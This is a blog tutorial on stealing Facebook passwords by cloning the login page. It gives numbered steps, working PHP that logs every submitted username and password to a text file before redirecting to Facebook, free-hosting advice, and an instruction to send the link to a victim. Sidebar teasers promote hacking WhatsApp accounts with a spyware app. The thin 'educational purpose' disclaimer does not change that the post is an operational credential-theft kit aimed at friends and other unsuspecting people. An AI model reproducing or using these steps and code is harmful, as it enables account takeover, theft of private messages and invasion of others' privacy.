Skip to main content

HACK Facebook Account by PHISHING:Only For Educational Purpose.

How to hack Facebook with phishing page


                                                                                       
                                                         

                                                      
As we all want to hack our friend facebook account,and want to read all his personal things.
Today i m gonna teach you how to hack a facebook account with a phishing page.





phishing:

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

FACEBOOK PHISHING....



                                                                         

steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.





                                          
2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.



                                                  

                                           
4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .



8.
Open a new notepad and save the given data with the name post.php.



                                                   

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

11.I prefer u to use 000webhost because it will be easy to use.
                           

                                              

12.You have to make a account in that ,after that it looks like a picture given below.


                                                                          
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.


                                        
   
                                        

15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .




                                        
16.Now the last step click on view of index.htm it will look same as facebook page.

                                         
17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                


                                        

19.Click on view now u will have your friend's password and email id.


                                           


20.This is a simple trick to hack any Facebook password account by phishing page.

21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.

Comments

Popular posts from this blog

How To Hack Anyone's Whatsapp Account

3 Ways To Hack Whatsapp Account 2017 At the moment, there are 1.3 billion Whatsapp users. This is a significant increase if you know that in 2016, the number was 1 billion. Obviously, due to simplicity and functionality, we can only assume that the number of users will go in one direction only, up! But, this also means that a higher number of people will want to  hack Whatsapp account . Yes, this is possible and there are three methods you can use. Method 1: Using Copy9 to hack someone’s Whatsapp Copy9 is the first method on our list. Basically, it is a full-size app which allows you to get a complete access to a targeted device. In recent months, we have been able to see a huge increase in the number of users. They are parents, spouses and business owners, among others. The main idea behind the app in question was to provide safety and security, rather than to use it for plain smartphone hacking, which is something we prefer. Yes, you can still  hack Whats...

Whatsapp live location launched

WhatsApp Live Location Sharing Launched: Here's How It Works WhatsApp, the  Facebook -owned messaging service, is giving its over 1 billion users another reason to keep coming back to the app multiple times a day: live location sharing.  WhatsApp , of course, already gives you the option to share your current location with other users, but that’s a static, one-time share. They key difference with live location sharing is that it is dynamic and updates your location in real time, even when WhatsApp is in the background. “Live location is a way to share your location in a chat and the participants in that chat will then be able to see your real-time location as it updates on a map. [It’s] short-term in nature, it’s limited in duration,” Zafir Khan, Product Manager at WhatsApp told Gadgets 360 while giving a demo of the feature earlier this week. Your location is shared at the chat level, which means you can share your live location in a one-on-one WhatsApp conversa...